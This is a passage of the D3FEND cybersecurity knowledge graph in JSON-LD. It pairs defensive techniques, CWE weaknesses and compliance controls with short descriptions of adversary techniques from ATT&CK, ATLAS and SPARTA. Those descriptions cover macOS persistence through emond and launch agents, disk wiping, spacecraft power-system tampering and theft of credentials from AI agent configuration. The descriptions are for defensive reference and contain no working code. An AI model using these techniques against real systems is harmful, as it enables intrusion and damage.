Tools, or Libraries\n\n- **scikit-learn**:\n\n    - A versatile machine learning library in Python.\n\n    - The `AgglomerativeClustering` class in scikit-learn provides this functionality.\n\n- **SciPy**:\n\n    - A Python library used for scientific and technical computing.\n\n    - The `scipy.cluster.hierarchy` module provides functions for hierarchical and\n    agglomerative clustering, including the `linkage` and `dendrogram` functions.\n\n- **R**:\n\n    - The `hclust` function in the stats package provides agglomerative clustering.\n\n    - The `agnes` function in the `cluster` package offers a more extensive implementation.\n\n- **MATLAB**:\n\n    - Offers the `linkage` function for hierarchical agglomerative clustering and `dendrogram` for visualization.\n\n- **Weka**:\n\n    - A collection of machine learning algorithms for data mining tasks.\n\n    - The `HierarchicalClusterer` class provides an implementation of agglomerative clustering.\n\n## References\n\n1. Jain, A. K., & Dubes, R. C. (1988). *Algorithms for clustering data*. Prentice-Hall, Inc.\n\n2. Murtagh, F., & Legendre, P. (2014). Ward’s hierarchical agglomerative clustering method: which algorithms implement Ward’s criterion?. *Journal of Classification*, 31(3), 274-295. [Link](https://link.springer.com/article/10.1007/s00357-014-9161-z).\n\n3. Scikit-learn. (30 Jun 2023). Scikit-learn Documentation: Agglomerative Clustering.\n[Link](https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html).",
      "rdfs:label": "Agglomerative Clustering",
      "rdfs:subClassOf": {
        "@id": "d3f:HierarchicalClustering"
      }
    },
    {
      "@id": "d3f:CWE-487",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-487",
      "d3f:definition": "Java packages are not inherently closed; therefore, relying on them for code security is not a good practice.",
      "rdfs:label": "Reliance on Package-level Scope",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-001356_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization monitors for atypical usage of information system accounts.",
      "d3f:exactly": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        }
      ],
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001356"
    },
    {
      "@id": "d3f:CWE-1055",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1055",
      "d3f:definition": "The product contains a class with inheritance from more than one concrete class.",
      "rdfs:label": "Multiple Inheritance from Concrete Classes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:OTDownloadControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a remote device to download a control program.",
      "rdfs:label": "OT Download Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommandEvent"
        },
        {
          "@id": "_:Ne22926ae286d4aaa8ea8128bc2a52591"
        },
        {
          "@id": "_:Nfa729ca93b5a45239e944fc6f0919ee6"
        }
      ]
    },
    {
      "@id": "_:Ne22926ae286d4aaa8ea8128bc2a52591",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:Nfa729ca93b5a45239e944fc6f0919ee6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDownloadControlProgramCommand"
      }
    },
    {
      "@id": "d3f:LinuxSocketcallArgumentSYS_SOCKET",
      "@type": "owl:Class",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/socketcall.2.html"
      },
      "rdfs:label": "Linux Socketcall Argument SYS_SOCKET",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateSocket"
      }
    },
    {
      "@id": "d3f:DefensiveTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTechnique"
      ],
      "d3f:definition": "A method which makes a computer system more difficult to attack.",
      "d3f:display-baseurl": "/technique/",
      "d3f:synonym": [
        "Countermeasure Technique",
        "Defensive Capability Feature",
        "Technical Security Control"
      ],
      "rdfs:label": "Defensive Technique",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/glossary/term/security_control"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CyberTechnique"
        },
        {
          "@id": "_:N86febf888f66478f95622a187c8f9a7e"
        },
        {
          "@id": "_:N7975ce0518934a10bfd65189fd7ca184"
        },
        {
          "@id": "_:Nd15f0515ca254a5688fb4c5fca438452"
        },
        {
          "@id": "_:N489b8c964da14304bdac85419abaf2ad"
        }
      ]
    },
    {
      "@id": "_:N86febf888f66478f95622a187c8f9a7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "_:N7975ce0518934a10bfd65189fd7ca184",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:kb-reference"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "_:Nd15f0515ca254a5688fb4c5fca438452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:d3fend-id"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:N489b8c964da14304bdac85419abaf2ad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:date"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:dateTime"
      }
    },
    {
      "@id": "d3f:T0839",
      "@type": "owl:Class",
      "d3f:attack-id": "T0839",
      "d3f:definition": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment.",
      "rdfs:label": "Module Firmware - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Module Firmware"
    },
    {
      "@id": "d3f:CommandHistoryLog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A log of commands run in an operating system shell.",
      "rdfs:label": "Command History Log",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:CommandLineInterface"
        },
        {
          "@id": "dbr:Command_history"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1086",
      "@type": "owl:Class",
      "d3f:attack-id": "T1086",
      "d3f:definition": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1059.001",
      "rdfs:label": "PowerShell",
      "rdfs:seeAlso": {
        "@id": "d3f:T1059.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:CCIControl",
      "@type": "owl:Class",
      "rdfs:label": "CCI Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControl"
        },
        {
          "@id": "_:N6dd1161e9db344e5af89f7b81c1555cf"
        },
        {
          "@id": "_:N7a95d9ce5e024dae98cb03c762b4cd9b"
        },
        {
          "@id": "_:Nb812dc3ea55a4a8980e79e433b7fcb07"
        }
      ]
    },
    {
      "@id": "_:N6dd1161e9db344e5af89f7b81c1555cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlCorrelationIdentifierCatalog"
      }
    },
    {
      "@id": "_:N7a95d9ce5e024dae98cb03c762b4cd9b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:control-name"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "_:Nb812dc3ea55a4a8980e79e433b7fcb07",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:published"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:dateTime"
      }
    },
    {
      "@id": "d3f:AccessToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer systems, an access token contains the security credentials for a login session and identifies the user, the user's groups, the user's privileges, and, in some cases, a particular application. Typically one may be asked to enter the access token (e.g. 40 random characters) rather than the usual password (it therefore should be kept secret just like a password).",
      "rdfs:label": "Access Token",
      "rdfs:seeAlso": {
        "@id": "dbr:Access_token"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Credential"
      },
      "skos:altLabel": [
        "Ticket",
        "Token"
      ]
    },
    {
      "@id": "d3f:T1625.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1625.001",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time.",
      "rdfs:label": "System Runtime API Hijacking - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1625"
      },
      "skos:prefLabel": "System Runtime API Hijacking"
    },
    {
      "@id": "d3f:SingularValueDecomposition",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SVD",
      "d3f:definition": "Singular Value Decomposition (SVD) is an algorithm that represents a matrix as a linear series of data and to find the set of factors that will best predict an outcome",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Singular value decomposition. [Link](https://en.wikipedia.org/wiki/Singular_value_decomposition)",
      "rdfs:label": "Singular Value Decomposition",
      "rdfs:subClassOf": {
        "@id": "d3f:DimensionReduction"
      }
    },
    {
      "@id": "d3f:EX-0010",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0010",
      "d3f:definition": "The adversary achieves on-board effects by introducing executable logic that runs on the vehicle, either native binaries and scripts, injected shellcode, or “data payloads” that an interpreter treats as code (e.g., procedure languages, table-driven automations). Delivery commonly piggybacks on legitimate pathways: software/firmware updates, file transfer services, table loaders, maintenance consoles, or command sequences that write to executable regions. Once staged, activation can be explicit (a specific command, mode change, or file open), environmental (time/geometry triggers), or accidental, where operator actions or routine autonomy invoke the implanted logic. Malicious code can target any layer it can reach: altering flight software behavior, manipulating payload controllers, patching boot or device firmware, or installing hooks in drivers and gateways that bridge bus and payload traffic. Effects range from subtle logic changes (quiet data tampering, command filtering) to overt actions (forced mode transitions, resource starvation), and may include secondary capabilities like covert communications, key material harvesting, or persistence across resets by rewriting images or configuration entries.",
      "rdfs:label": "Malicious Code - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExecutionTechnique"
      },
      "skos:prefLabel": "Malicious Code"
    },
    {
      "@id": "d3f:Reference-SupplyChainCyber-deception_Cymmetria,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/WO2017187379A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network from external endpoints, comprising monitoring, at a protected network, communication with one or more external endpoints using one or more access clients to access one or more of a plurality of resources of the protected networked, where one or more deception resources created in the protected network map one or more of the plurality of resources, detecting usage of data contained in one or more of a plurality of deception data objects deployed in the one or more access clients by monitoring an interaction triggered by one or more of the deception data objects with the one or more deception resources when used and identifying one or more potential unauthorized operations based on analysis of the detection.",
      "d3f:kb-author": "Gadi EVRON; Dean SYSMAN; Imri Goldberg; Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "Supply chain cyber-deception",
      "rdfs:label": "Reference - Supply chain cyber-deception - Cymmetria, Inc."
    },
    {
      "@id": "d3f:excises",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x excises y: Technique x removes a section of entity y.",
      "rdfs:label": "excises",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1546.014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.014",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place.",
      "d3f:may-create": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:modifies": {
        "@id": "d3f:ConfigurationResource"
      },
      "rdfs:label": "Emond",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N96726ac871574644956937af64c16ec5"
        },
        {
          "@id": "_:Nb824dfba7fef4063b8fdc59074bdc64a"
        },
        {
          "@id": "_:Nf18f13b777d440d5a98cc0a4369e9faf"
        }
      ]
    },
    {
      "@id": "_:N96726ac871574644956937af64c16ec5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Nb824dfba7fef4063b8fdc59074bdc64a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "_:Nf18f13b777d440d5a98cc0a4369e9faf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:CWE-444",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-444",
      "d3f:definition": "The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.",
      "d3f:synonym": [
        "HTTP Request Smuggling",
        "HTTP Response Smuggling",
        "HTTP Smuggling"
      ],
      "rdfs:label": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:T1561.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1561.002",
      "d3f:definition": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.",
      "d3f:may-modify": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:PartitionTable"
        }
      ],
      "rdfs:label": "Disk Structure Wipe",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1561"
        },
        {
          "@id": "_:N5054c7573d204e788e1d9dc4f14cbf6b"
        },
        {
          "@id": "_:Nc154604557074f9195fe8b0fe06d4fdf"
        }
      ]
    },
    {
      "@id": "_:N5054c7573d204e788e1d9dc4f14cbf6b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nc154604557074f9195fe8b0fe06d4fdf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "d3f:ComputingServer",
      "@type": "owl:Class",
      "d3f:definition": "A compute server is a system specifically designed to undertake large amounts of computation, usually but not necessarily in a client/server environment.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.encyclopedia.com/computing/dictionaries-thesauruses-pictures-and-press-releases/compute-server"
      },
      "rdfs:label": "Computing Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:OrganizationMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OrganizationMapping"
      ],
      "d3f:d3fend-id": "D3-OM",
      "d3f:definition": "Organization mapping identifies and models the people, roles, and groups with an organization and the relations between them.",
      "d3f:display-order": 4,
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-OrganizationalManagementInSAPERPHCM"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": [
        {
          "@id": "d3f:Dependency"
        },
        {
          "@id": "d3f:Organization"
        },
        {
          "@id": "d3f:Person"
        }
      ],
      "d3f:may-map": {
        "@id": "d3f:OperationalActivityPlan"
      },
      "rdfs:label": "Organization Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperationalActivityMapping"
        },
        {
          "@id": "_:N94628d33a65940389dfa03f43ae21b4a"
        },
        {
          "@id": "_:N5ee9028255f04e098fec04241674fb61"
        },
        {
          "@id": "_:Nfa6defcc3ead415388a4fedaa55e555c"
        },
        {
          "@id": "_:N956c937f24d94efbac096cbede9aa7c5"
        }
      ]
    },
    {
      "@id": "_:N94628d33a65940389dfa03f43ae21b4a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Dependency"
      }
    },
    {
      "@id": "_:N5ee9028255f04e098fec04241674fb61",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Organization"
      }
    },
    {
      "@id": "_:Nfa6defcc3ead415388a4fedaa55e555c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Person"
      }
    },
    {
      "@id": "_:N956c937f24d94efbac096cbede9aa7c5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-map"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperationalActivityPlan"
      }
    },
    {
      "@id": "d3f:CWE-1067",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1067",
      "d3f:definition": "The product contains a data query against an SQL table or view that is configured in a way that does not utilize an index and may cause sequential searches to be performed.",
      "rdfs:label": "Excessive Execution of Sequential Searches of Data Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1176"
      }
    },
    {
      "@id": "d3f:LogicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LogicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-LLM",
      "d3f:definition": "Logical link mapping creates a model of existing or previous node-to-node connections using network-layer data or metadata.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-LibreNMSDocsNetworkMapExtension"
      },
      "d3f:maps": [
        {
          "@id": "d3f:LogicalLink"
        },
        {
          "@id": "d3f:Network"
        },
        {
          "@id": "d3f:NetworkNode"
        }
      ],
      "rdfs:label": "Logical Link Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkMapping"
        },
        {
          "@id": "_:N79555bac6f6d4a159109da7b205b2b47"
        },
        {
          "@id": "_:N536a37ee5ecd4aa69750b6df6bd36894"
        },
        {
          "@id": "_:Nc1105f610f844d278470e96aed54cc5d"
        }
      ]
    },
    {
      "@id": "_:N79555bac6f6d4a159109da7b205b2b47",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LogicalLink"
      }
    },
    {
      "@id": "_:N536a37ee5ecd4aa69750b6df6bd36894",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "_:Nc1105f610f844d278470e96aed54cc5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:maps"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkNode"
      }
    },
    {
      "@id": "d3f:T1543.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.001",
      "d3f:creates": {
        "@id": "d3f:PropertyListFile"
      },
      "d3f:definition": "Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.",
      "rdfs:label": "Launch Agent",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N244ca21c3d9444259b32f2b4b7cd536a"
        }
      ]
    },
    {
      "@id": "_:N244ca21c3d9444259b32f2b4b7cd536a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PropertyListFile"
      }
    },
    {
      "@id": "d3f:d3fend-display-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-display-property y: An object x should be displayed using the display property y, when it applies.",
      "rdfs:label": "d3fend-display-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:CWE-280",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-280",
      "d3f:definition": "The product does not handle or incorrectly handles when it has insufficient privileges to access resources or functionality as specified by their permissions. This may cause it to follow unexpected code paths that may leave the product in an invalid state.",
      "rdfs:label": "Improper Handling of Insufficient Permissions or Privileges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-755"
      }
    },
    {
      "@id": "d3f:AML.T0083",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0083",
      "d3f:definition": "Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent.\n\nAI Agents often utilize external tools or services to take actions, such as querying databases, invoking APIs, or interacting with cloud resources. To enable these functions, credentials like API keys, tokens, and connection strings are frequently stored in configuration files. While there are secure methods such as dedicated secret managers or encrypted vaults that can be deployed to store and manage these credentials, in practice they are often placed in less protected locations for convenience or ease of deployment. If an attacker can read or extract these configurations, they may obtain valid credentials that allow direct access to sensitive systems outside the agent itself.",
      "rdfs:label": "Credentials from AI Agent Configuration - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0083"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "Credentials from AI Agent Configuration"
    },
    {
      "@id": "d3f:T1407",
      "@type": "owl:Class",
      "d3f:attack-id": "T1407",
      "d3f:definition": "Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.",
      "rdfs:label": "Download New Code at Runtime - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Download New Code at Runtime"
    },
    {
      "@id": "d3f:kb-reference-of",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x kb-is-example-of y: The reference x is an example of technique y.",
      "rdfs:label": "kb-reference-of",
      "rdfs:range": {
        "@id": "d3f:CyberTechnique"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      },
      "skos:altLabel": "kb-is-example-of"
    },
    {
      "@id": "d3f:T1094",
      "@type": "owl:Class",
      "d3f:attack-id": "T1094",
      "d3f:definition": "Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of fundamental protocols provided by TCP/IP/another standard network stack.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1095",
      "rdfs:label": "Custom Command and Control Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1095"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CommandAndControlTechnique"
      }
    },
    {
      "@id": "d3f:CWE-838",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-838",
      "d3f:definition": "The product uses or specifies an encoding when generating output to a downstream component, but the specified encoding is not the same as the encoding that is expected by the downstream component.",
      "rdfs:label": "Inappropriate Encoding for Output Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:AML.T0048",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0048",
      "d3f:definition": "Adversaries may abuse their access to a victim system and use its resources or capabilities to further their goals by causing harms external to that system.\nThese harms could affect the organization (e.g. Financial Harm, Reputational Harm), its users (e.g. User Harm), or the general public (e.g. Societal Harm).",
      "rdfs:label": "External Harms - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0048"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "External Harms"
    },
    {
      "@id": "d3f:EX-0012.09",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.09",
      "d3f:definition": "Adversaries alter parameters and sensed values that govern power generation, storage, and distribution so the spacecraft draws or allocates energy in harmful ways. Editable items include bus voltage/current limits, MPPT setpoints and sweep behavior, array and SADA modes, battery charge/discharge thresholds and temperature derates, state-of-charge estimation constants, latching current limiter (LCL) trip/retry settings, load-shed priorities, heater duty limits, and survival/keep-alive rules. By changing these, a threat actor can drive excess consumption (e.g., disabling load shed, raising heater floors), misreport remaining energy (skewed SoC), or push batteries outside healthy ranges, producing brownouts, repeated safing, or premature capacity loss. Manipulating thresholds and hysteresis can also create oscillations where loads repeatedly drop and re-engage, wasting energy and stressing components. The effect is accelerated depletion or misallocation of finite power, degrading mission operations and potentially preventing recovery after eclipse or anomalies.",
      "rdfs:label": "Electrical Power Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/09/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Electrical Power Subsystem"
    },
    {
      "@id": "d3f:PhysicalAddress",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In a computer supporting virtual memory, the term physical address is used mostly to differentiate from a virtual address. In particular, in computers utilizing a memory management unit(MMU) to translate memory addresses, the virtual and physical addresses refer to an address before and after translation performed by the MMU, respectively.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Physical_address"
      },
      "rdfs:label": "Physical Address",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:T0885",
      "@type": "owl:Class",
      "d3f:attack-id": "T0885",
      "d3f:definition": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol. They may use commonly open ports, such as the examples provided below.",
      "rdfs:label": "Commonly Used Port - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Commonly Used Port"
    },
    {
      "@id": "d3f:PlatformUptimeMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PlatformUptimeMonitoring"
      ],
      "d3f:d3fend-id": "D3-PUM",
      "d3f:definition": "Monitor the amount of time since the last power cycle or restart.",
      "d3f:kb-article": "## How it works\nMonitoring the time since the last power cycle or restart alerts operators to unexpected restarts and their frequency. This can indicate potential issues or malicious activity, and provides valuable information for forensic investigations.\n\n## Considerations\nThe source of the variable may be mutable depending on the platform, and the provenance of the value.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
      },
      "d3f:monitors": {
        "@id": "d3f:PlatformUptime"
      },
      "rdfs:label": "Platform Uptime Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:Neaf094c777dd4175896b9943e3c2c66d"
        }
      ]
    },
    {
      "@id": "_:Neaf094c777dd4175896b9943e3c2c66d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PlatformUptime"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingAlgorithm-generatedDomains_VECTRANETWORKSInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
